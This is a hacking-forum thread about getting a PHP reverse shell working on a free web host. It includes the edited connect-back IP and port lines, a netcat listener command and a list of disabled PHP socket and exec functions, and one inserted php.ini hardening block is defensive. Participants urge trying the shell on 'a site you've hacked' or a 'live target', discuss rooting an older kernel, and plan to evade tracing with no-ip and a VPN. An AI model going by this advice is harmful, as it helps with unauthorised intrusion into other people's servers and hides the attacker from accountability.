[help]issues with setting up reverse php shell.
  • mandi
    Posts: 207
    As the topic says, I had some issues with setting up a reverse PHP shell.

    I downloaded this php-reverse shell:

    http://pentestmonkey.net/tools/web-shells/php-reverse-shell


    And I modified this part

    $ip = '127.0.0.1'; // CHANGE THIS
    $port = 1234; // CHANGE THIS


    with my IP address and port 135 (that is the only open port I found on my PC during a port scan).
    I am using XP SP2 for this purpose.

    And I saved the file and uploaded it to the web host.

    And I opened the php-reverse shell in my browser, and after that I opened netcat and typed the following command as mentioned in the tutorial:


    $ nc -v -n -l -p 135


    But I am getting this:

    http://i55.tinypic.com/2hnneck.jpg

    I don't know what went wrong. Also I have a dynamic IP, and I don't like to set up the whole thing each and every time.

    Here are my questions:
    1) What is the problem in my set-up?
    2) And what should I do in order to avoid uploading and changing the configuration of the php-reverse shell each time?
    3) Also, will PHP function restrictions and safe mode, if set to ON, have an impact on the reverse shell set-up?

    4) Or, from your experience, please suggest me the best way/tutorial to get a reverse shell from the target,
    because I would like to play with kernel exploits, execute OS commands and other funny things.

    Hope I will find some help here..
  • Sh3llc0d3
    Posts: 1,910
    What happens when you load the php file?

    Guessing what your answer will be, and assuming you aren't running the php shell in an appropriate environment (php enabled correctly): you are trying to a) use a php shell in an environment that will not allow it; b) the IP will need to be changed every time your IP changes. You can't do much about that without changing to a static IP. It's easy to set up (google is your friend).

    To fix... taking on board that my assumptions are correct... you need to download xampp or wampserver (I recommend wampserver), install it and copy the php file into the root directory C:/wamp/www/ (by default) and then open it in your browser. Wampserver and xampp both have apache and php installed, which will run your php file fine.

    Try that, find your IP and put the correct one in, and then load netcat. Let us know the outcome :)
  • mandi
    Posts: 207
    Actually I tried to set up this thing on a free web host, to learn some server rooting techniques, and I had some good news and bad news.

    Bad news:
    the following is the list of PHP functions being restricted on the web host:

    fopen,fwrite,gethostbyname,file_put_contents,ini_set,system,exec,phpinfo,escapeshellarg,upload_file,rmdir,escapeshellcmd,passthru,proc_close,proc_open,shell_exec,chmod,chown,chroot,chgrp,fsockopen,ftp_connect,ftp_ssl_connect,pfsockopen,socket_connect,socket_create,socket_listen,socket_bind,socket_accept,socket_create_listen,socket_send,socket_write,socket_read,symlink,mail,dl,inf


    And after this I made netcat work;
    here is the picture:

    http://i51.tinypic.com/2ivma8y.jpg

    And when I opened the shell on the web host nothing is happening.
    Maybe it is the effect of the PHP function restrictions?

    Can you enlighten me with any ideas to get past these restrictions to get a successful back connection please?
  • Sh3llc0d3
    Posts: 1,910
    The shell won't work on hosting because it is designed to open a socket connection between the shell on the server (this means opening a port) and the netcat session. This is something most shared hosting actively blocks. You have pretty much no control over ports on shared web hosting, only an ftp account.

    Those restrictions are put there for a purpose, and risking trying to enable them just to check a shell isn't worth the effort. You'd be better finding a site you've hacked and trying it out live.

    EDIT: Out of that list, the below are the ones that are used for socket programming:

    gethostbyname,fsockopen,ftp_connect,ftp_ssl_connect,pfsockopen,socket_connect,socket_create,socket_listen,socket_bind,socket_accept,socket_create_listen,socket_send,socket_write,socket_read


    The rest are mostly to allow for basic Linux administration tasks (rmdir etc).
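    As an added illustration (not from this post, the host, or the pentestmonkey tool): the php.ini setting behind the behaviour described above, shown once in its permissive default and once with the socket functions listed in this post plus the command-execution functions from mandi's list disabled, which is how a shared host turns an uploaded reverse shell into a dead script.

```ini
; Added example: php.ini fragment, illustrative rather than any real host's file.

; --- Weak: stock php.ini. Nothing is disabled, so any uploaded script can
; open an outbound TCP connection (fsockopen) and attach a shell (proc_open),
; which is exactly what the pentestmonkey reverse shell does.
disable_functions =

; --- Hardened: what a shared host such as the one in this thread applies.
; Socket/network primitives from the list above, plus the command-execution
; functions from mandi's list. The value must be ONE line (php.ini has no
; line continuation) and it is PHP_INI_SYSTEM, so a script cannot undo it
; with ini_set(); that is also why ini_set itself is often on the list.
disable_functions = gethostbyname,fsockopen,pfsockopen,ftp_connect,ftp_ssl_connect,socket_connect,socket_create,socket_listen,socket_bind,socket_accept,socket_create_listen,socket_send,socket_write,socket_read,system,exec,shell_exec,passthru,proc_open,proc_close,escapeshellarg,escapeshellcmd,dl

; Only one disable_functions line is honoured in a real file (the last one
; wins); keep the hardened line and delete the empty one above.
; Check what is active from the server's CLI:  php -i | grep disable_functions

; safe_mode was the other knob people relied on, but it was deprecated in
; PHP 5.3 and removed in 5.4, so disable_functions is the control that remains.
```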
  • mandi
    Posts: 207

    > The shell won't work on hosting because it is designed to open a socket connection between the shell on the server (this means opening a port) and the netcat session. This is something most shared hosting actively blocks. You have pretty much no control over ports on shared web hosting, only an ftp account.
    >
    > Those restrictions are put there for a purpose, and risking trying to enable them just to check a shell isn't worth the effort. You'd be better finding a site you've hacked and trying it out live.
    >
    > EDIT: Out of that list, the below are the ones that are used for socket programming:

    Got it mate, so it seems the set-up was ok, and the socket restrictions implemented (i.e. via disabled PHP functions) on the web server are what is preventing me, right?

    Yes, I am going to try this on a live target :)

    And I am going to tell you the truth: I had uploaded the shell on t35.com, but they had disabled many PHP functions. But they are using a slightly older kernel, 2.6.18 I think; it looks rootable.

    And one last question mate: assume none of the functions are disabled, but suppose safe mode is ENABLED. In that case can I successfully get a back connection using the set-up I followed?

    And thanks for the clarification mate, you always rock when it comes to coding :)
  • Sh3llc0d3
    Posts: 1,910
    I'm not 100% sure on the PHP safe mode, but you should be able to make a socket connection. Yeah, it would seem the restrictions on the web server are the cause of your problems. They do it for that reason lol. Also make sure, if it's your main t35 account, that you remove the script from their servers. They can be quite shitty with dodgy scripts.

    I'd put money on it that it'd work on a normal live target. You could boot into backtrack (as it has apache webserver and php installed) and try it on there locally.
  • m0rph
    Posts: 332
    I almost guarantee it's solely not working because of the port you chose. TCP 135 is a Windows RPC port, and as far as I'm aware it's usually listening by default.

    Change your port. It should work then. Also, don't be in a private network when using reverse shells. Port forwarding is retarded, and a waste of time.

    Simply plug your computer directly into your modem. Restart your modem, and refresh your IP address in whatever OS you are using.

    Another thing to be cautious about when using reverse shells... you leave yourself wide open to being traced back. There are really very few things you can do for anonymity with reverse shells.

    But, to solve your initial problem... change your listening port.
    while( !(succeed = try() ) );
  • mandi
    Posts: 207
    I would like to say some things I have heard:
    I heard that in PHP 6 there would be no magic quotes protection and no safe mode :)

    But I don't know what equivalent security mechanisms they are going to include there as an alternative to these?

    And thanks for the idea mate :), I am actually trying this on a WAMP server in a Windows environment.


    > I almost guarantee it's solely not working because of the port you chose. TCP 135 is a Windows RPC port, and as far as I'm aware it's usually listening by default.
    >
    > Change your port. It should work then. Also, don't be in a private network when using reverse shells. Port forwarding is retarded, and a waste of time.
    >
    > Simply plug your computer directly into your modem. Restart your modem, and refresh your IP address in whatever OS you are using.
    >
    > Another thing to be cautious about when using reverse shells... you leave yourself wide open to being traced back. There are really very few things you can do for anonymity with reverse shells.
    >
    > But, to solve your initial problem... change your listening port.

    Thanks mate, see my second picture.
    And regarding anonymity, we can do it like this, nah?
    Create a no-ip account, place its address in the shell and access the shell over a VPN connection :). I think if we do it like this the chances of getting caught would be very, very low.
  • Xin
    Posts: 3,251
    I haven't really read through the whole thread so I could be wrong, but you're trying to use port 135 as it's the only open port on your computer. If you have scanned yourself with nmap, it will not show what you look like from the outside; you need to use a website to check yourself, as the port could be open locally but your router blocks it. So you will need to open ports on your router.

    Another reason why it may not work is that port 135 is most likely being used already.
    Xin